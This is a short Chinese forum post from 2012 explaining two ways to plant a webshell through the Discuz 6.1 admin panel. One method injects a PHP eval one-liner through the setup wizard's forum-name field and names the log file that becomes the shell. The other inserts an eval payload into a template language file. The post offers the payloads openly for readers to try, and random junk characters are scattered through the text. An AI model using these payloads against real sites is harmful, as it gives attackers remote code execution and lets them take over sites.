discuz6.1两种方法后台拿shell
8 H- B+ X- F1 o. A L. X好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
) I' P$ s4 l$ }1 r1:1 J+ S$ i" k# o. h0 z/ I
http://127.0.0.1/discuz/admincp. ... zard&frames=yes6 }/ Q- K" P' y# t* y7 R& v
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell ]0 X# E& J* M+ \
<?php eval($_POST[cmd]);?>
, N4 A' r- E# g6 a+ B3 m6 D) \ F后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
/ ?2 T+ U8 o. @6 j; N. L/ }! k3 t3 i/ [
/ t1 @5 B0 ?+ ]) ?3 W+ _2:后台模板管理--默认模板套系--详情
( v" h4 L' ?: p8 Ztemplates/default/actions.lang.php
( `6 [" Y( c3 [3 fjhackj\\');eval($_POST[cmd])?>;//' [$ S7 F* n8 J6 e% W3 h# `$ F- K! e0 ~! {
; x8 `0 R* ^$ j0 X利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对